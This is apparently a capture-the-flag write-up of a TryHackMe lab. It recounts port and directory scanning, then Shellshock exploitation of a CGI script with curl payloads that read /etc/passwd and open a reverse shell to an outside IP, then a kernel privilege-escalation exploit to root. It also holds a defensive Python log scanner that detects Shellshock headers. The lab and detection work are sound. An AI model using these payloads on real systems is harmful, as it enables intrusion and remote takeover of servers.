0day
Source: THM
Exploit Ubuntu, like a Turtle in a Hurricane
nmap port scan
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
Only ports 22 and 80 are open.
gobuster directory scan
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/backup (Status: 301)
/cgi-bin (Status: 301)
/cgi-bin/ (Status: 403)
/css (Status: 301)
/img (Status: 301)
/js (Status: 301)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
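Under /backup/ I found an SSH key file, downloaded it locally and cracked it with ssh2john.
It was not much use though, since there is no username.
Because a cgi-bin directory exists, I thought of probing it with nikto.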
+ /cgi-bin/test.cgi: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
This entry showed up, and the script is accessible.
Exploitation:
https://github.com/opsxcq/exploit-CVE-2014-6271
https://www.exploit-db.com/exploits/34900
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.47.227/cgi-bin/test.cgi
Reverse shell
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.13.18.193/1234 0>&1'" \
http://10.10.47.227/cgi-bin/test.cgi
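A defender-side check for the requests above, as an added example that is not part of the original writeup: it scans Apache combined-format access log lines for a bash function-definition prefix in the logged Referer or User-Agent. The function name, sample log lines and addresses are constructed for illustration.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# A header value carrying a bash function definition: "()" then "{",
# with optional whitespace, as in the user-agent sent by the curl commands.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')


def find_shellshock_probes(lines):
    """Return one finding per log line whose Referer or User-Agent
    contains a bash function-definition prefix."""
    findings = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not a combined-format line
        for field in ("referer", "agent"):
            if FUNC_DEF.search(m.group(field)):
                parts = m.group("request").split()
                path = parts[1] if len(parts) > 1 else ""
                findings.append({
                    "host": m.group("host"),
                    "path": path,
                    "field": field,
                    # CGI targets are where the header reaches bash
                    "cgi": path.startswith("/cgi-bin/"),
                    "status": int(m.group("status")),
                })
                break
    return findings


# Constructed sample log lines (documentation address range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 3025 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 13 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /robots.txt HTTP/1.1" 200 38 "() { :;}; echo probe" "curl/7.58.0"',
]

if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

Only headers that Apache writes to the log are visible to this check; a payload sent in another header needs a custom LogFormat or a WAF rule to be seen.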
Privilege escalation
uname -a
ubuntu 3.13.0-32-generic
Exploit: https://www.exploit-db.com/exploits/37292
gcc: error trying to exec 'cc1': execvp: No such file or directory
To get past this, the PATH environment variable has to be set for gcc:
export PATH=/usr/bin:$PATH
At this point we are root.